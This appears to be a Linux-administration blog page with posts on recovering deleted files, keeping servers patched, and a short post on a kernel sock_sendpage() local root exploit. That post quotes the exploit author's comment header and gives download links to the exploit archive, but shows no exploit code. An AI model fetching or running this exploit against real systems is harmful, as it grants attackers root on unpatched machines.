One of the simplest ways to recover "deleted" files is to not delete them at all. This is the idea behind a trash can—a tool or procedure to hold onto files that are to be deleted without actually deleting them. These files can be deleted automatically or manually, depending on the tool or procedure. The most familiar form of trash can utility for most users, and the one from which the name derives, is the trash can icon that exists in many popular GUI environments, including KDE and GNOME. To use a GUI trash can, you drag files you want to delete to its icon. The icon is basically just a pointer to a specific directory that’s out of the way or hidden from view, such as ~/Desktop/Trash or ~/.gnome-desktop/Trash. When you drag a file to the trash can, you’re really just moving it to that directory. If you subsequently decide you want to undelete the file, you can click or double-click the trash can icon to open a file browser on the trash directory. This enables you to drag the files you want to rescue out of the trash directory. Typically, files are only deleted from the trash directory when you say so by right-clicking the trash can icon and selecting an option called Empty Trash or something similar.

When you’re working from the command line, the rm command is the usual method of deleting files, as in rm somefile.txt. This command doesn’t use anything akin to the trash directory by default, and depending on your distribution and its default settings, rm may not even prompt you to be sure you’re deleting the files you want to delete. You can improve rm’s safety considerably by forcing it to confirm each deletion by using the -i option, as in rm -i somefile.txt. In fact, you may want to make this the default by creating an alias in your shell startup scripts, "Mastering Shells and Shell Scripting." For instance, the following line in ~/.bashrc or /etc/profile will set up such an alias for bash: 

alias rm='rm -i'

This configuration can become tedious if you use the -r option to delete an entire directory tree, though, or if you simply want to delete a lot of files by using wildcards. You can override the alias by specifying the complete path to rm (/bin/rm) when you type the command.

Forcing confirmation before deleting files can be a useful preventive measure, but it’s not really a way of recovering deleted files. One simple way to allow such recovery is to mimic the GUI environments’ trash cans—instead of deleting files with rm, move them to a holding directory with mv. You can then empty the holding directory whenever it’s convenient. In fact, if you use both a command shell and a GUI environment that implements a trash can, you can use the same directory for both.

If you or your users are already familiar with rm, you may find it difficult to switch to using mv. It’s also easy to forget how many files have been moved into the trash directory, and so disk space may fill up. One solution is to write a simple script that takes the place of rm, but that moves files to the trash directory. This script can simultaneously delete files older than a specified date or delete files if the trash directory contains more than a certain number of files. Alternatively, you could create a cron job to periodically delete files in the trash directory. An example of such a script is saferm, which is available from http://myocard.com/sites/linker/pages/linux/saferm.html. To use saferm or any similar script, you install it in place of the regular rm command, create an alias to call the script instead of rm, or call it by its true name. For instance, the following alias will work: 

alias rm='saferm'

In the case of saferm, the script prompts before deleting files, but you can eliminate the prompt by changing the line that reads read answer to read answer=A and commenting out the immediately preceding echo lines. The script uses a trash directory in the user’s home directory, ~/.trash. When users need to recover "deleted" files, they can simply move them out of ~/.trash. This specific script doesn’t attempt to empty the trash bin, so users must do this themselves using the real rm; or you or your users can create cron jobs to do the task.

File Recovery Tools

Undelete utilities for Linux are few and far between. The Linux philosophy is that users shouldn’t delete files they really don’t want to delete, and if they do, they should be restored from backups. Nonetheless, in a pinch there are some tricks you can use to try to recover accidentally deleted files.

Note

Low-level disk accesses require full read (and often write) privileges to the partition in question. Normally, only root has this access level to hard disks, although ordinary users may have such access to floppies. Therefore, normally only root may perform low-level file recoveries.

One of these tricks is the recover utility, which is headquartered at http://recover.sourceforge.net/linux/recover/ and available with most Linux distributions. Unfortunately, this tool has several drawbacks. The first is that it was designed for ext2fs, and so it doesn’t work with most journaling filesystems. (It may work with ext3fs, though.) Another problem is that recover takes a long time to do anything, even on small partitions. I frequently see network programs such as web browsers and mail clients crash when recover runs. Finally, in my experience, recover frequently fails to work at all; if you type recover /dev/sda4, for instance, to recover files from /dev/sda4, the program may churn for a while, consume a lot of CPU time, and return with a Terminated notice. In sum, recover isn’t a reliable tool, but you might try it if you’re desperate. If you do try to run it, I recommend shutting down unnecessary network-enabled programs first.

Another method of file recovery is to use grep to search for text contained in the file. This approach is unlikely to work on anything but text files, and even then it may return a partial file or a file surrounded by text or binary junk. To use this approach, you type a command such as the following: 

# grep -a -B5 -A100 "Dear Senator Jones" /dev/sda4 > recover.txt

This command searches for the text Dear Senator Jones on /dev/sda4 and returns the five lines before (-B5) and the 100 lines after (-A100) that string. The redirection operator stores the results in the file recover.txt. Because this operation involves a scan of the entire raw disk device, it’s likely to take a while. (You can speed matters up slightly by omitting the redirection operator and instead cutting and pasting the returned lines from an xterm into a text editor; this enables you to hit Ctrl+C to cancel the operation once it’s located the file. Another option is to use script to start a new shell that copies its output to a file, so you don’t need to copy text into an editor.) This approach also works with any filesystem. If the file is fragmented, though, it will only return part of the file. If you misjudge the size of the file in lines, you’ll either get just part of the file or too much—possibly including binary data before, after, or even within the target file.

Restoring Files from a Backup

"Protecting Your System with Backups," describes system backup procedures. That chapter also includes information on emergency recovery procedures—restoring most or all of a working system from a backup. Such procedures are useful after a disk failure, security breach, or a seriously damaging administrative blunder. System backups can also be very useful in restoring deleted files. In this scenario, an accidentally deleted file can be restored from a backup. One drawback to this procedure is that the original file must have existed prior to the last regular system backup. If your backups are infrequent, the file might not exist. Even if you make daily backups, this procedure is unlikely to help if a user creates a file, quickly deletes it, and then wants it back immediately. A trash can utility is the best protection against that sort of damage.

As an example, suppose you create backups to tape using tar. You can recover files from this backup by using the –extract (-x) command. Typically, you also pass the –verbose (-v) option so that you know when the target file has been restored, and you use –file (-f) to point to the tape device file. You must also pass the name of the file to be restored: 

# tar -xvf /dev/st0 home/al/election.txt

This command recovers the file home/al/election.txt from the /dev/st0 tape device. A few points about this command require attention:

Permissions  The user who runs the command must have read/write access to the tape device. This user must also have write permission to the restore directory (normally, the current directory). Therefore, root normally runs this command, although other users may have sufficient privileges on some systems. Ownership and permissions on the restored file may change if a user other than root runs the command.

Filename Specification  The preceding command omitted the leading slash (/) in the target filename specification (home/al/election.txt). This is because tar normally strips this slash when it writes files, so when you specify files for restoration, the slash must also be missing. A few utilities and methods of creating a backup add a leading ./ to the filename. If your backups include this feature, you must include it in the filename specification to restore the file.

Restore Directory  Normally, tar restores files to the current working directory. Thus, if you type the preceding command while in /root, it will create a /root/home/al/election.txt file (assuming it’s on the tape). I recommend restoring to an empty subdirectory and then moving the restored file to its intended target area. This practice minimizes the risk that you might mistype the target file specification and overwrite a newer file with an older one, or even overwrite the entire Linux installation with the backup.

Unfortunately, tar requires that you have a complete filename, including its path, ready in order to recover a file. If you don’t know the exact filename, you can try taking a directory of the tape by typing tar tvf /dev/st0 (substituting another tape device filename, if necessary). You may want to pipe the result through less or grep to help you search for the correct filename, or redirect it to a file you can search.

Tip

You can keep a record of files on a tape at backup time to simplify searches at restore time. Using the –verbose option and redirecting the results to a file will do the trick. Some incremental backup methods automatically store information on a backup’s contents, too. Some backup tools, such as the commercial Backup/Recover Utility (BRU; http://www.bru.com), store an index of files on the tape. This index enables you to quickly scan the tape and select files for recovery from the index

Tagged with:
Aug 15

Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit

By jason Security Tools No Comments »

/* dedicated to my best friend in the whole world, Robin Price
   the joke is in your hands

   just too easy — some nice library functions for reuse here though

   credits to julien tinnes/tavis ormandy for the bug

   may want to remove the __attribute__((regparm(3))) for 2.4 kernels,
   I have no time to test

spender@www:~$ cat redhat_hehe
I bet Red Hat will wish they closed the SELinux vulnerability when they
were given the opportunity to.  Now all RHEL boxes will get owned by
leeches.c :p

fd7810e34e9856f77cba67f291ba115f33411ebd
d4b0e413ebf15d039953dfabf7f9a2d1

thanks to Dan Walsh for the great SELinux bypass even on "fixed" SELinux
policies

and nice work Linus on trying to silently fix an 8 year old
vulnerability, leaving vendors without patched kernels for their users.

  use ./wunderbar_emporium.sh for everything

don’t have mplayer? watch an earlier version of the exploit at:
http://www.youtube.com/watch?v=arAfIp7YzZ4

*/

http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
back: http://milw0rm.com/sploits/2009-wunderbar_emporium.tgz

Tagged with:
Aug 12

Linux System Secruity,Part 3

By jason Application Security No Comments »
Keeping the System Up to Date

Many compromised systems owe their inglorious compromised status to lack of appropriate maintenance. A few minutes spent checking for and installing software updates on a regular basis can save uncountable hours of work later, because updated software frequently includes fixes for security bugs. If you update buggy software quickly enough, would-be intruders will not be able to exploit security vulnerabilities.

The Importance of Server Updates

Software bugs can take many forms and have many different types of effects. Bugs can corrupt data, crash the affected program, or make the program behave in some odd way. Some bugs are security-related. They may allow a person to write arbitrary files in arbitrary locations (potentially overwriting critical configuration files), or give the abuser the ability to run programs under some other username. In sum, such bugs can compromise the system, giving a normal user superuser privileges.

Servers, like any other program, can be buggy. Buggy servers are particularly important because they’re potentially more accessible than are buggy local programs. If a non-network program (say, man) contains a security-related bug, only local users can exploit the bug. Assuming your users are trustworthy, and assuming a cracker hasn’t gained local access to your system, such a bug won’t cause harm. (Of course, those assumptions aren’t always valid, so fixing such bugs is important.) Many servers, by contrast, are accessible to the world at large. If a flaw in a Web server allows any user to take control of the computer, then that Web server is vulnerable to attack from just about anybody. Thus, security bugs in servers are particularly critical, and it’s vital you protect yourself against them.

The problem is exacerbated by the fact that many servers run as root. If a program (server or nonserver) that runs as an ordinary user is compromised, chances are little damage can be done with it. For instance, such a program can’t ordinarily rewrite your /etc/passwd file. If a program that runs as root is compromised, though, the attacker has much greater power; if such a program can be made to write arbitrary files, changing /etc/passwd is very possible. Many servers need root privileges to function correctly. For instance, root access is needed to provide login services, or even to listen to the first 1024 ports, on which most servers run. (A super server runs as root, but can spawn a server that runs as another user, even when it serves a sub-1024 port.)

For all of these reasons, it’s critical that you keep your servers up to date. You don’t necessarily need to perform every server update, because many server updates exist to add features or fix nonsecurity bugs that might not affect you. You should upgrade whenever an update emerges that fixes a security bug, though.

How to Monitor for Updated Software

There are several ways to look for updated software packages:

  • Software package Web sites and mailing lists? Most software packages, including most servers, have official Web sites, mailing lists, and occasionally newsgroups or other communication forums. You can monitor these resources on a regular basis to locate software updates. This approach can be tedious, though; a Linux system may have a dozen or more servers installed, and monitoring all the relevant forums can be difficult at best. This approach is best reserved for unusual packages梩hose that aren’t part of your normal distribution’s software mixnd perhaps for very popular servers you might be running.

  • Your distribution’s Web site? All distributions have Web pages that include information on software updates. Distribution maintainers do the work of monitoring various security resources, including the Web pages for the individual server packages included in the distribution. This provides you with a one-stop location for security and other update information. The drawback is that it may take some time for a security fix to filter down from its original source to your distribution’s Web page. In a best-case scenario, the delay might be just a few minutes, but it’s more likely to be a few hours or even days.

  • Generic security information sources? The upcoming section, "Keeping Abreast of Security Developments," describes resources for information on security-related developments. These can be extremely useful and important. They usually include information on workarounds to problems, if they exist, so you may be able to take steps to minimize the risk before an official fix is available. You’ll have to go back to the program maintainer or your distribution’s updates page to obtain fixed software, though.

In most cases, some combination of the last two approaches is a good way to keep an eye on security developments. Reading your servers’ Web sites can also be important, particularly if you’re using unusual servers that aren’t officially supported by your distribution. A quick check of two or three Web pages or newsgroups once a day can save untold hours of work recovering from a break-in. Even a once-a-week check is better than nothing, and a periodic comparison of installed packages against the latest versions available can help catch updates that might have slipped through the cracks, as it were.

Automatic Software Update Procedures

Unfortunately, manually checking for software updates can be tedious at best. For this reason, there are several tools available to help automate the process. These include the following:

  • apt-get? This program is a standard part of the Debian distribution and its derivatives. It’s used for installing software, and it can also check for updates to already installed packages. Specifically, typing apt-get update followed by apt-get dist-upgrade will retrieve updated package information and then upgrade any packages that have newer versions. Replace the second command with apt-get -s -u upgrade to receive a report on new packages without actually installing them. Using apt-get in this way will only work, however, if you list at least one Debian package distribution site in the /etc/apt/sources.list file. There are also ports of apt-get (part of the larger apt package) for RPM-based systems, such as the one created by Connectiva (http://distro.conectiva.com/projetos/42) and apt4rpm (http://apt4rpm.sourceforge.net).

  • Red Hat’s Update Agent? Red Hat uses a package it calls the Update Agent to help keep systems up to date. This package requires you to register with Red Hat, and the program sends information on your computer’s hardware and software to Red Hat. It can then keep your system updated. Configuration and use of the program is moderately complex, so you should consult its documentation at http://www.redhat.com/docs/manuals/RHNetwork/ref-guide/ for more information.

Automatic security updates are desirable in many ways, because they can help protect you against security breaches. They aren’t without their drawbacks, though. By giving an automatic process control of your computer, you’re entrusting it with a huge responsibility. Automatic updates can and do fail in various ways. For instance, an updated package might include a new bug or an incompatibility with another important package (especially if you’ve mixed packages from your distribution with others you build yourself or install from tarballs). It’s also conceivable that a cracker could break into the automatic update site or a DNS server in order to deliver modified packages. Because Debian packages sometimes include installation scripts that require human interaction, you shouldn’t run apt-get in a cron job or other automated procedure; you should run it manually, even if you plan to do so on a regular basis. (Using apt-get -s -u upgrade in a cron job should be safe, though.) These tools don’t always differentiate between security updates and others that are less critical, but which might cause problems for your system.

On the whole, automated software updates can be quick and convenient, but I recommend using them only in a strictly supervised manner. Ideally, you should be able to authorize individual upgrades so as to head off problems due to an overzealous update agent. This is an area of active development, so it’s likely that these tools will become more sophisticated and helpful in the future.

Tagged with:
Previous Entries
preload preload preload